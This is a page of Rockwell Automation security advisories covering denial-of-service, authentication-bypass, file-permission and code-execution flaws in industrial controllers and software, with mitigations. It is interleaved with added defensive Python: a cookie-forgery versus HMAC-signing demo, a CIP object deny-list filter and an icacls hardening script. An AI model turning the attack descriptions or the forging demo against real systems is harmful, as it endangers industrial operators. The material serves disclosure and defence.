Customers using the affected software are encouraged to apply security best practices.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-8533

 

High
SD1693 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Vulnerable to DoS vulnerability via CIP
Published Date:
September 10, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-6077
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: 9/12/2024

Updated Date: 9/12/2024

Revision Number: 1.0

CVSS: v3.1: 7.5, v4.0: 8.7

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Family                  First Known in Software/Firmware Version   Corrected in Software/Firmware Version
CompactLogix 5380                v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
CompactLogix 5380 Process        v33.011                                    v33.017, v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL 2    v32.013                                    v33.017, v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL 3    v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
CompactLogix 5480                v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
ControlLogix® 5580               v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
ControlLogix® 5580 Process       v33.011                                    v33.017, v34.014, v35.013, v36.011 and later
GuardLogix 5580                  v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
1756-EN4                         v2.001                                     v6.001 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6077 IMPACT

A denial-of-service vulnerability exists in the affected products when specially crafted packets are sent to the CIP Security Object. If exploited, the device will become unavailable and require a factory reset to recover.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
CWE-20:  Improper Input Validation 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers who are unable to upgrade to the corrected software versions are encouraged to apply the following risk mitigations. 

  • Users who do not wish to use CIP Security can disable the feature per device. See "Disable CIP Security" in Chapter 2 of "CIP Security with Rockwell Automation Products" (publication SECURE-AT001).

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

    JSON CVE-2024-6077

Critical
SD1692 | ThinManager® ThinServer™ Information Disclosure and Remote Code Execution Vulnerabilities
Published Date:
August 21, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7986, CVE-2024-7987, CVE-2024-7988
CVSS Scores (v3.1):
5.5, 7.8, 9.8
CVSS Scores (v4.0):
6.8, 8.5, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/22/24

Last updated: 8/22/24

Revision Number: 1.0

CVSS Score: v3.1: 5.5, 7.8, 9.8, v4.0: 6.8, 8.5, 9.3

AFFECTED PRODUCTS AND SOLUTION

Affected Product            First Known in software version   Corrected in software version
ThinManager® ThinServer™    11.1.0-11.1.7                     11.1.8
                            11.2.0-11.2.8                     11.2.9
                            12.0.0-12.0.6                     12.0.7
                            12.1.0-12.1.7                     12.1.8
                            13.0.0-13.0.4                     13.0.5
                            13.1.0-13.1.2                     13.1.3
                            13.2.0-13.2.1                     13.2.2

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Nicholas Zubrisky of Trend Micro Security Research.

CVE-2024-7986 IMPACT

A vulnerability exists in the affected products that allows a threat actor to disclose sensitive information. A threat actor can exploit this vulnerability by abusing the ThinServer™ service to read arbitrary files by creating a junction that points to the target directory.

CVSS Base Score v3.1: 5.5/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS Base Score v4.0: 6.8/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management

Known Exploited Vulnerability (KEV) database:  No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

CVE-2024-7987 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. To exploit this vulnerability, a threat actor must abuse the ThinServer™ service by creating a junction and using it to upload arbitrary files.

CVSS Base Score v3.1: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource

 

CVE-2024-7988 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.

CVSS Base Score v3.1: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Mitigations and Workarounds

Customers using the affected software are encouraged to implement our suggested security best practices to minimize the risk of the vulnerability.

·       Security Best Practices

 ADDITIONAL RESOURCES

·       JSON CVE-2024-7986

·       JSON CVE-2024-7987

·       JSON CVE-2024-7988

High
SD1689 | AADvance® Standalone OPC-DA Server Code Execution Vulnerability via Vulnerable Component
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2018-1285, CVE-2006-0743
CVSS Scores (v3.1):
7.5, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: Please see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.  

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

AADvance® Standalone OPC-DA Server

v2.01.510

v2.02 and later

VULNERABILITY DETAILS

CVE IMPACT

An arbitrary code execution vulnerability exists in the affected product. The vulnerability occurs due to a vulnerable component, Log4Net v1.2, which has multiple vulnerabilities listed below:

  • CVE-2018-1285, CVSS score 7.5 - log4net config file does not disable XML external entities
    • CVSS Base Score: 7.5
    • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 
    • CWE-20:  Improper Input Validation 
    • Known Exploited Vulnerability (KEV) database: None
  • CVE-2006-0743, CVSS score 5.3 - format string vulnerability in log4net
    • CVSS Base Score: 5.3 
    • CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 
    • CWE-134:  Use of Externally Controlled Format String
    • Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2006-0743

  • JSON CVE-2018-1285

High
SD1687 | Authentication Bypass Vulnerability in DataMosaix™
Published Date:
August 13, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-6078
CVSS Scores (v3.1):
9.1
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: 8/13/2024

Updated Date: 8/13/2024 
Revision Number: 1.0

CVSS: v3.1: 9.1, v4.0: 8.6 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product             First Known in Software Version   Corrected in Software Version
DataMosaix™ Private Cloud    V7.07 <                           v7.09 or later

 

Mitigations and Workarounds

  • Customers using the affected software are encouraged to upgrade the DataMosaix™ Private Cloud software from V7.07 to V7.09. The application support team will work with respective customers to upgrade. 

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6078 IMPACT

An improper authentication vulnerability exists in the affected product, which could allow a malicious user to generate cookies for any user ID without the use of a username or password. If exploited, a malicious user could take over the account of a legitimate user. The malicious user would be able to view and modify data stored in the cloud. 

CVSS Base Score: 9.1  
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS Base Score: 8.6 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N 
CWE-287:  Improper Authentication 
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.
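The failure mode described for CVE-2024-6078 (a cookie that names a user ID and is accepted without any proof it was issued by the server) is the textbook shape of CWE-287. The Python below is an added, generic illustration and not DataMosaix code: the advisory does not say how the product constructs its cookies, so issue_unsigned/read_unsigned only stand in for the forgeable pattern, and issue_signed/read_signed show the usual fix (an HMAC over the user ID and an expiry, checked with a constant-time compare). The key, user IDs and timestamps are constructed for the example.

```python
"""Forgeable vs. authenticated session cookies (CWE-287 pattern).

Added example, not DataMosaix code. The 'unsigned' scheme is a generic stand-in
for a cookie that any client can mint for any uid; the 'signed' scheme binds
uid and expiry with an HMAC only the server can compute.
"""
import hashlib
import hmac
import time
from typing import Optional

# Constructed server-side secret; in practice load it from a secret store.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def issue_unsigned(uid: int) -> str:
    """Vulnerable: anyone who knows the format can mint a cookie for any uid."""
    return f"uid={uid}"


def read_unsigned(cookie: str) -> Optional[int]:
    """Vulnerable: trusts the uid field as-is, so a forged cookie logs the attacker in."""
    if cookie.startswith("uid="):
        return int(cookie[4:])
    return None


def _sig(payload: str, key: bytes) -> str:
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_signed(uid: int, key: bytes, ttl_s: int = 3600, now: Optional[int] = None) -> str:
    """Fixed: cookie carries uid and expiry, bound by an HMAC over both fields."""
    now = int(time.time()) if now is None else now
    payload = f"uid={uid};exp={now + ttl_s}"
    return f"{payload};sig={_sig(payload, key)}"


def read_signed(cookie: str, key: bytes, now: Optional[int] = None) -> Optional[int]:
    """Return the uid only if the MAC verifies and the cookie is unexpired."""
    now = int(time.time()) if now is None else now
    try:
        payload, sig_field = cookie.rsplit(";", 1)
        fields = dict(f.split("=", 1) for f in payload.split(";"))
        uid, exp = int(fields["uid"]), int(fields["exp"])
        provided = sig_field.removeprefix("sig=")
    except (ValueError, KeyError):
        return None
    if not hmac.compare_digest(provided, _sig(payload, key)):
        return None                 # tampered uid/exp, or minted under another key
    if now >= exp:
        return None                 # expired
    return uid


def forge(cookie: str, new_uid: int) -> str:
    """Attacker tampering: rewrite the uid field and leave everything else alone."""
    parts = cookie.split(";")
    return ";".join(f"uid={new_uid}" if p.startswith("uid=") else p for p in parts)


if __name__ == "__main__":
    print("unsigned takeover uid:", read_unsigned(forge(issue_unsigned(7), 1)))
    c = issue_signed(7, SERVER_KEY)
    print("signed, forged uid accepted as:", read_signed(forge(c, 1), SERVER_KEY))
```

forge models the attacker in the advisory: with the unsigned scheme it yields a working cookie for any uid; with the signed one the rewritten uid no longer matches the MAC and read_signed returns None. A real deployment would additionally bind the cookie to a server-side session record so that it can be revoked, which a pure MAC cannot do.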

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6078

High
SD1685 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Controller Denial-of-Service Vulnerability via Input Validation
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7507
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2.0 

September 14, 2024 - Updated Affected Product and Solutions Table

CVSS Score: v3.1 7.5/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product                 First Known in Firmware Version   Corrected in Firmware Version
CompactLogix 5380                v28.011                           v34.014, v35.013, v36.011 and later
ControlLogix 5580                v28.011                           v34.014, v35.013, v36.011 and later
GuardLogix 5580                  v31.011                           v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL2     v31.011                           v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL3     v32.013                           v34.014, v35.013, v36.011 and later
CompactLogix 5480                v32.011                           v34.014, v35.013, v36.011 and later

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

  • Restrict communication to CIP object 103 (0x67)

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 
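Two device-side mitigations on this page are phrased in terms of CIP objects: SD1693 (CVE-2024-6077) says to disable CIP Security per device, and the SD1685 mitigation above says to restrict communication to CIP object 103 (0x67). To make either of those checkable on the wire, the following Python is an added example (not Rockwell code and not from publication SECURE-AT001): it parses a CIP Message Router request (service code, request-path size, EPATH logical segments) and flags requests whose target class is on a deny list. Class 0x67 is the PCCC object named in the mitigation above; class 0x5D for the CIP Security Object is an assumption taken from public CIP object numbering, not from the advisory. The sample frames are constructed, not captured traffic, and the deny list generalizes to any class you decide to fence off.

```python
"""Classify CIP explicit-message requests by the object class they target.

Added example, not Rockwell code. Parses the CIP Message Router request
format (service, request-path size in 16-bit words, EPATH logical segments)
so a monitoring or filtering hook can flag requests to objects an advisory
tells you to fence off.
"""
from dataclasses import dataclass
from typing import Optional

# Logical segment header bytes of the CIP EPATH encoding.
_SEG_CLASS_8, _SEG_CLASS_16 = 0x20, 0x21
_SEG_INST_8, _SEG_INST_16 = 0x24, 0x25
_SEG_ATTR_8, _SEG_ATTR_16 = 0x30, 0x31

SERVICE_EXECUTE_PCCC = 0x4B  # service used against the PCCC object
CLASS_PCCC = 0x67            # SD1685 mitigation: "CIP object 103 (0x67)"
CLASS_CIP_SECURITY = 0x5D    # assumption: CIP Security Object class ID

DENY_CLASSES = {CLASS_PCCC, CLASS_CIP_SECURITY}


@dataclass
class CipRequest:
    service: int
    class_id: Optional[int]
    instance: Optional[int]
    attribute: Optional[int]
    data: bytes


def parse_cip_request(frame: bytes) -> CipRequest:
    """Parse service, EPATH and payload of a CIP Message Router request."""
    if len(frame) < 2:
        raise ValueError("frame too short for service + path size")
    service = frame[0]
    path_len = frame[1] * 2          # request-path size is in 16-bit words
    path = frame[2:2 + path_len]
    if len(path) != path_len:
        raise ValueError("request path truncated")
    class_id = instance = attribute = None
    i = 0
    while i < len(path):
        seg = path[i]
        if seg in (_SEG_CLASS_8, _SEG_INST_8, _SEG_ATTR_8):
            if i + 1 >= len(path):
                raise ValueError("8-bit logical segment missing its value")
            value, i = path[i + 1], i + 2
        elif seg in (_SEG_CLASS_16, _SEG_INST_16, _SEG_ATTR_16):
            # 16-bit form: header byte, pad byte, then little-endian value
            if i + 3 >= len(path):
                raise ValueError("16-bit logical segment truncated")
            value = int.from_bytes(path[i + 2:i + 4], "little")
            i += 4
        else:
            raise ValueError(f"unsupported path segment 0x{seg:02X}")
        if seg in (_SEG_CLASS_8, _SEG_CLASS_16):
            class_id = value
        elif seg in (_SEG_INST_8, _SEG_INST_16):
            instance = value
        else:
            attribute = value
    return CipRequest(service, class_id, instance, attribute, frame[2 + path_len:])


def is_denied(frame: bytes, deny=DENY_CLASSES) -> bool:
    """True if the request targets a denied class, or cannot be parsed (fail closed)."""
    try:
        req = parse_cip_request(frame)
    except ValueError:
        return True
    return req.class_id in deny


# Constructed sample frames (not captured traffic).
# Execute PCCC (0x4B) to class 0x67 instance 1, followed by a dummy payload.
PCCC_REQUEST = bytes([0x4B, 0x02, 0x20, 0x67, 0x24, 0x01]) + b"\x07\x00\x00\x00"
# Get_Attribute_Single (0x0E) on the Identity object (0x01), instance 1, attribute 7.
IDENTITY_REQUEST = bytes([0x0E, 0x03, 0x20, 0x01, 0x24, 0x01, 0x30, 0x07])
# The same Identity request using the 16-bit class segment form.
IDENTITY_REQUEST_16 = bytes([0x0E, 0x04, 0x21, 0x00, 0x01, 0x00, 0x24, 0x01, 0x30, 0x07])

if __name__ == "__main__":
    for name, frame in [("pccc", PCCC_REQUEST), ("identity", IDENTITY_REQUEST)]:
        req = parse_cip_request(frame)
        print(f"{name}: service=0x{req.service:02X} class=0x{req.class_id:02X} "
              f"denied={is_denied(frame)}")
```

This is the decision logic a deep-packet-inspection firewall or IDS rule in front of the controller needs; it fails closed on malformed request paths, which is the right default for objects whose whole problem is malformed input. Bear in mind that blocking class 0x67 also blocks legitimate PCCC clients (legacy PLC-5/SLC-style messaging), so inventory those before enforcing.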

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7507 IMPACT

A denial-of-service vulnerability exists in the affected products. This vulnerability occurs when a malformed PCCC message is received, causing a fault in the controller. PCCC messages reach the controller through the CIP PCCC object (class 0x67), which is why the mitigation above restricts communication to that object.

CVSS 3.1 Base Score: 7.5 
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20:  Improper Input Validation

Known Exploited Vulnerability (KEV) database: None

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2024-7507

High
SD1688 | FactoryTalk® View Site Edition Code Execution Vulnerability via File Permissions
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7513
CVSS Scores (v3.1):
8.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 8/13/2024 
Last Updated: 8/15/2025 
Revision Number: 2
CVSS Score: v3.1: 8.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product
First Known in Software Version
Corrected in Software Version
FactoryTalk® View SE

13.0

15.00

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply security best practices, if possible.

  • By default, all HMI server projects are saved in the HMI projects folder on the HMI server computer located at C:\Users\Public\Documents\RSView Enterprise\SE\HMI projects. To enhance security and prevent unauthorized modifications to these projects, you can tighten the Windows folder's security settings on the HMI server computer by following these steps:
    • Remove the INTERACTIVE group from the folder’s security properties.
    • Add specific users or user groups and assign their permissions to this folder as needed.
    • If you assign read-only permission to those users or user groups, they can only view and will not be able to write to project files. Users with read-only permission can still test run and run the FactoryTalk® View SE client.
  • In Version 14: Open FactoryTalk® View Studio -> Help -> FactoryTalk® View SE Help -> In the Help file -> Security -> “HMI projects folder”

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 
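The folder-permission steps above are described as GUI steps on one HMI server. The Python below is an added example, not Rockwell's, that scripts the same ACL change through the Windows icacls tool so it can be applied and audited consistently across servers: it builds the icacls command lines (cut inheritance, remove INTERACTIVE, grant named groups), runs them, and parses icacls' listing output to confirm no INTERACTIVE entry remains. The folder path is the one stated above; the principals in DESIRED_GRANTS are placeholders to replace with your own groups, and SAMPLE_LISTING/SAMPLE_BEFORE are constructed icacls outputs, not captured from a server.

```python
"""Script the HMI projects folder hardening from SD1688 with icacls.

Added example, not Rockwell code. Builds the icacls invocations equivalent to
the advisory's GUI steps and parses `icacls <folder>` output to audit the result.
"""
import re
import subprocess
from typing import Dict, List

HMI_PROJECTS = r"C:\Users\Public\Documents\RSView Enterprise\SE\HMI projects"
INTERACTIVE_SID = "*S-1-5-4"   # well-known SID for INTERACTIVE; icacls takes SIDs prefixed with '*'

# Placeholders (assumption): principals that should keep access after hardening.
# Rights letters are icacls' simple rights: F=full, M=modify, RX=read+execute.
# (OI)(CI) make the entry inherit to child files and folders.
DESIRED_GRANTS = {
    "NT AUTHORITY\\SYSTEM": "(OI)(CI)F",
    "BUILTIN\\Administrators": "(OI)(CI)F",
    "CORP\\HMI-Developers": "(OI)(CI)M",   # may edit project files
    "CORP\\HMI-Operators": "(OI)(CI)RX",   # read-only; can still run the SE client
}


def build_hardening_commands(folder: str = HMI_PROJECTS,
                             grants: Dict[str, str] = DESIRED_GRANTS) -> List[List[str]]:
    """Return the icacls invocations in the order they must run."""
    cmds = [
        # Stop inheriting from the parent but keep current entries as explicit ones,
        # so the (normally inherited) INTERACTIVE grant becomes removable here.
        ["icacls", folder, "/inheritance:d"],
        # Remove every granted entry for INTERACTIVE (the advisory's first step).
        ["icacls", folder, "/remove:g", INTERACTIVE_SID, "/T", "/C"],
    ]
    for principal, rights in grants.items():
        # /grant:r replaces any existing explicit grant for that principal.
        cmds.append(["icacls", folder, "/grant:r", f"{principal}:{rights}", "/T", "/C"])
    return cmds


def apply_hardening(folder: str = HMI_PROJECTS) -> None:
    """Run the commands (Windows, from an elevated prompt)."""
    for cmd in build_hardening_commands(folder):
        subprocess.run(cmd, check=True)


_ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<rights>.+)$")


def parse_icacls_listing(output: str, folder: str = HMI_PROJECTS) -> Dict[str, str]:
    """Map principal -> rights string from `icacls <folder>` output."""
    aces: Dict[str, str] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(folder):          # first line carries the path
            line = line[len(folder):].strip()
        m = _ACE_RE.match(line)
        if m:
            aces[m.group("principal")] = m.group("rights")
    return aces


def interactive_removed(output: str, folder: str = HMI_PROJECTS) -> bool:
    """True when no entry for INTERACTIVE remains in the listing."""
    return not any(p.upper().endswith("INTERACTIVE")
                   for p in parse_icacls_listing(output, folder))


# Constructed icacls output, not captured from a server.
SAMPLE_BEFORE = (
    HMI_PROJECTS + " NT AUTHORITY\\INTERACTIVE:(OI)(CI)(M)\n"
    "                 NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    "\nSuccessfully processed 1 files; Failed processing 0 files\n"
)
SAMPLE_LISTING = (
    HMI_PROJECTS + " NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    "                 BUILTIN\\Administrators:(OI)(CI)(F)\n"
    "                 CORP\\HMI-Developers:(OI)(CI)(M)\n"
    "                 CORP\\HMI-Operators:(OI)(CI)(RX)\n"
    "\nSuccessfully processed 1 files; Failed processing 0 files\n"
)

if __name__ == "__main__":
    for cmd in build_hardening_commands():
        print(" ".join(cmd))
    print("INTERACTIVE removed (before):", interactive_removed(SAMPLE_BEFORE))
    print("INTERACTIVE removed (after): ", interactive_removed(SAMPLE_LISTING))
```

Order matters: INTERACTIVE is typically inherited from C:\Users\Public, and an inherited entry cannot be removed on the child until inheritance is cut, hence /inheritance:d first. /grant:r replaces rather than merges, so stale explicit grants do not linger. Snapshot the existing ACL with icacls <folder> /save <file> /T before changing it, and run the script from an elevated prompt.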

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7513 IMPACT

A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions, which allow any user to edit or replace files that are then executed by an account with elevated permissions.

CVSS 3.1 Base Score: 8.8 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource 
Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

  • JSON CVE-2024-7513

High
SD1690 | GuardLogix/ControlLogix 5580 Controller denial-of-service Vulnerability via Malformed Packet Handling
Published Date:
August 13, 2024
Last Updated:
September 13, 2024
CVE IDs:
CVE-2024-40619
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2.0

September 13th, 2024 – Updated “Corrected in Firmware Versions”

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.  

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware Version

Corrected in Firmware Version

ControlLogix® 5580

v34.011

v34.014, v35.011 and later

GuardLogix 5580

v34.011

v34.014, v35.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-40619 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5 
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE-754:  Improper Check for Unusual or Exceptional Conditions 

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities. 

High
SD1691 | Pavilion8® Unencrypted Data Vulnerability via HTTP protocol
Published Date:
August 13, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-40620
CVSS Scores (v3.1):
7.4
CVSS Scores (v4.0):
5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, v4.0: 5.3/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in software version Corrected in software revision
Pavilion8® v5.20 v6.0

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Interactions between the Console and Dashboard take place on the same machine; that machine should sit behind a firewall, and physical access to it should be limited to authorized personnel.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

CVE-2024-40620 IMPACT

A vulnerability exists in the affected product due to lack of encryption of sensitive information. The vulnerability results in data being sent between the Console and the Dashboard without encryption, which can be seen in the logs of proxy servers, potentially impacting the data's confidentiality.

CVSS 3.1 Base Score: 7.4/10
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CVSS 4.0 Base Score: 5.3/10
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

CWE-311: Missing Encryption of Sensitive Data

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

